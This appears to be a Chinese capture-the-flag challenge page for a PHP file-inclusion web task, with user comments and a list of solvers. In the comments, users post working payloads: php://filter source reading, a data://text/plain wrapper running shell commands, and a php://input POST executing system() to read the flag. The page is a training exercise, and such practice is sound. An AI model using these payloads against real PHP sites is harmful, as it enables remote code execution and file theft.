简单的IncludeWEB 未解决

分数: 15 金币: 2
题目作者: hanzkj
一  血: flagOrz
一血奖励: 2金币
解  决: 196
提  示:
描  述:

听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。

...
登录回复
评论
网恋秀牛子被录屏导致自卑 2月前
举报

/?page=data://text/plain,<?=exec("cat /fla?")?>

回复 0
shrinp 2月前
举报

php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可

回复 0
yinghui130 3月前
举报

POST /?page=php://input HTTP/1.1 <br> Host: 171.80.2.169:15133 <br> <br> <?php system('tac /flag ');?>

回复 1
网恋秀牛子被录屏导致自卑 2月前
举报

@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了

回复 0
111222 3月前
举报

谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过

回复 0
Jazz888 3月前
举报

flag{**********}

回复 0
wywitkey 3月前
举报

解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag

回复 0

WriteUp

image
gxnb123

3 金币

立即查看

评分(0)

暂无评分

解题动态

guapi.gz 攻破了该题 4天前
mbw 攻破了该题 4天前
WylK 攻破了该题 5天前
regvfds 攻破了该题 6天前
无情的白给机器人 攻破了该题 8天前
liqs 攻破了该题 9天前
乱来小木 攻破了该题 10天前
hackerbugku 攻破了该题 12天前
yyt030 攻破了该题 16天前
kiritoldws 攻破了该题 17天前
jiubanyipeng 攻破了该题 24天前
qq1002517 攻破了该题 24天前
scv 攻破了该题 26天前
xiaoxiaojiangshi 攻破了该题 29天前
shuiniu221 攻破了该题 1月前
xyqsin 攻破了该题 1月前
klfx1913 攻破了该题 1月前
等往事风中吹‘ 攻破了该题 1月前
Clinale 攻破了该题 1月前
瓜喵~ 攻破了该题 1月前
问题反馈